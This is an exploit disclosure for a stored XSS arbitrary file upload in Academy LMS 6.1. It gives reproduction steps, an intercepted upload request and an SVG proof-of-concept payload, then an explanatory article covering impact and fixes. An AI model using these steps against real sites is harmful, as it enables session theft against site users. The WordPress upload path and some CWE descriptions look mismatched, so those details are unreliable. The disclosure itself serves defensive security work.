Academy LMS 6.1 - Arbitrary File Upload

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-09-04 
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707


## Description

Allows Attacker to upload malicious files onto the server, such as Stored XSS


## Steps to Reproduce:

1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]

-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2

-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg



[-] Done


Academy LMS 6.1 – Arbitrary File Upload Vulnerability: A Deep Dive into Stored XSS Exploitation

Academy LMS 6.1, a widely used learning management system developed by Creativeitem, has been found to harbor a critical security flaw: Arbitrary File Upload. This vulnerability, identified by researcher CraCkEr on August 5, 2023, allows authenticated users to upload malicious files—specifically crafted SVG files—directly to the server’s public directory, enabling Stored Cross-Site Scripting (XSS) attacks. The implications are severe, as this flaw bypasses standard file validation and permits attackers to inject persistent JavaScript payloads that execute whenever the file is accessed.

Understanding the Vulnerability: CWE-79, CWE-74, and CWE-707

The exploit falls under three well-known CWE (Common Weakness Enumeration) categories:

  • CWE-79: Improper Neutralization of Input During Output – This refers to the failure to sanitize user input before rendering it in web output, allowing malicious scripts to be executed.
  • CWE-74: Improper Neutralization of Input – Indicates a lack of validation or filtering of user-supplied data, particularly during file uploads.
  • CWE-707: Improper Restriction of Operations within the Bounds of a Data Type – Highlights the absence of proper file type restrictions, allowing non-image formats to be uploaded under the guise of image files.

These weaknesses collectively point to a systemic failure in input validation and file handling, which is often overlooked in web applications that assume "image uploads" are inherently safe.

Exploitation Path: Step-by-Step Breakdown

Attackers can exploit this vulnerability through a simple yet effective workflow:

  1. Authentication: Log in as a normal user with basic privileges.
  2. Access Profile Settings: Navigate to the User Dashboard and access the Profile Settings section at https://website/dashboard/#/settings.
  3. Upload Image: Select any image file (e.g., a PNG or JPEG) and upload it as an avatar.
  4. Intercept Request: Use Burp Suite to capture the POST request to /wp-admin/async-upload.php.
  5. Modify File Extension: Change the filename from image.png to ahacka.svg and set the Content-Type to image/svg+xml.
  6. Inject Malicious Payload: Replace the image content with a malicious SVG file containing embedded JavaScript.
  7. Send Request: Forward the modified request to the server.
  8. Retrieve File Path: Use Burp Logger to capture the resulting GET request and determine the uploaded file’s URL.
  9. Trigger XSS: Access the uploaded file via https://website/wp-content/uploads/***/**/*****.svg, triggering the script.

Malicious SVG Payload: The Core of the Attack






  
  
    alert("XSS by CraCkEr");

This SVG file is crafted to appear as a harmless image while containing a stored XSS payload. The <script> tag is embedded directly in the SVG document, which is parsed by browsers that support SVG rendering. Since the file is uploaded to a public directory, any user visiting the URL will execute the script.

Why SVG is Effective: SVG files are often not subjected to strict MIME-type validation, especially in systems that assume all uploaded files are images. This makes them ideal for bypassing security checks. Additionally, SVGs are inherently XML-based, allowing for full scripting capabilities—something not commonly expected in image files.

Impact and Real-World Consequences

Impact Description
Stored XSS Malicious scripts persist on the server and execute on every access, compromising all users who view the file.
Privilege Escalation Attackers can upload PHP files (if file extensions are not restricted) to achieve remote code execution.
Session Hijacking JavaScript can steal cookies or session tokens, enabling account takeover.
Phishing SVG files can redirect users to fake login pages or trigger pop-ups mimicking legitimate interfaces.

Even in a seemingly benign context like avatar uploads, this vulnerability opens the door to full-scale compromise of the LMS environment.

Security Recommendations and Fixes

Organizations using Academy LMS 6.1 must act immediately to mitigate this risk. The following measures are recommended:

  • Strict File Type Validation: Implement server-side checks using MIME type detection and file extension filtering. Only allow .jpg, .png, and .gif for avatar uploads.
  • Content Inspection: Scan uploaded files for embedded scripts, <script>, or <iframe> tags using regex or XML parsers.
  • Upload Directory Restriction: Store uploaded files in a non-public directory and serve them via a secure proxy script, preventing direct access.
  • Sanitization: Use libraries like DOMPurify to sanitize SVG content before rendering.
  • Regular Audits: Conduct penetration testing and code reviews to identify similar vulnerabilities in other upload paths.

Additionally, developers should avoid relying solely on client-side validation. Server-side enforcement is critical to prevent attackers from bypassing front-end checks.

Conclusion: A Lesson in Defense-in-Depth

The Academy LMS 6.1 arbitrary file upload vulnerability underscores a fundamental truth in cybersecurity: assumptions about file safety are dangerous. Just because a file is labeled as an "image" doesn’t mean it’s safe. Attackers exploit trust in file types to deliver malicious payloads.

Security professionals must adopt a defense-in-depth approach—validating file content, restricting file types, and sanitizing output. This exploit serves as a reminder that even small features like profile avatars can become entry points for devastating attacks.

For administrators: Update to the latest version or apply patches immediately. For developers: never trust user input—validate, sanitize, and restrict. Security is not a feature; it’s a foundation.